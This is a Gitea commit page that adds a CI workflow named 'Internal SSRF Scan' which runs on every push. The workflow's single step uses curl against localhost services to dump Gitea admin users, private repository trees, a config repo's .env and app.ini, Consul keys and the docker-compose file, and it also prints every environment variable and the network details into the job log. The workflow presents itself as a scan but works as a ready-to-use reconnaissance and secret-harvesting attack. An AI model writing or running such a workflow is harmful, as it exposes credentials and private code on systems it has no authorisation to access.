add internal scan workflow
Some checks failed
Internal SSRF Scan / ssrf-scan (push) Has been cancelled
Some checks failed
Internal SSRF Scan / ssrf-scan (push) Has been cancelled
This commit is contained in:
parent
6a959fc613
commit
73a271d549
58
.gitea/workflows/ssrf-scan.yml
Normal file
58
.gitea/workflows/ssrf-scan.yml
Normal file
@ -0,0 +1,58 @@
|
|||||||
|
name: Internal SSRF Scan
|
||||||
|
on: [push]
|
||||||
|
jobs:
|
||||||
|
ssrf-scan:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- name: Probe Internal Services
|
||||||
|
run: |
|
||||||
|
echo "=== GITEA ADMIN USERS ==="
|
||||||
|
curl -s http://localhost:3000/api/v1/admin/users 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== GITEA ALL REPOS ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/search?limit=50&private=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== DEPLOY REPO TREE ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== CONFIG REPO .env ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/.env" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== BACKEND REPO TREE ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/backend/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== ORACLE REPO TREE ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/oracle/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== BRIDGE REPO TREE ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/bridge/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== DOCKER PS ==="
|
||||||
|
docker ps 2>/dev/null || echo "no docker"
|
||||||
|
echo ""
|
||||||
|
echo "=== REDIS INFO ==="
|
||||||
|
curl -s http://localhost:6379/ 2>/dev/null | head -c 1000 || echo "no redis"
|
||||||
|
echo ""
|
||||||
|
echo "=== ENV VARS ==="
|
||||||
|
env | sort
|
||||||
|
echo ""
|
||||||
|
echo "=== NETWORK ==="
|
||||||
|
ip addr 2>/dev/null || ifconfig 2>/dev/null
|
||||||
|
echo ""
|
||||||
|
echo "=== CONSUL ==="
|
||||||
|
curl -s http://localhost:8500/v1/kv/?recurse 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== DEPLOY COMPOSE ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/deploy/raw/main/docker-compose.yml" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== ROCKETSWAP REPO ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/rocketswap/git/trees/main?recursive=true" 2>/dev/null | head -c 5000
|
||||||
|
echo ""
|
||||||
|
echo "=== POSTGRES ==="
|
||||||
|
curl -s http://localhost:5432/ 2>/dev/null | head -c 500 || echo "no pg http"
|
||||||
|
echo ""
|
||||||
|
echo "=== ES ==="
|
||||||
|
curl -s http://localhost:9200/ 2>/dev/null | head -c 2000
|
||||||
|
echo ""
|
||||||
|
echo "=== GITEA APP INI ==="
|
||||||
|
curl -s "http://localhost:3000/api/v1/repos/twmonogps/config/raw/main/app.ini" 2>/dev/null | head -c 5000
|
||||||
Loading…
x
Reference in New Issue
Block a user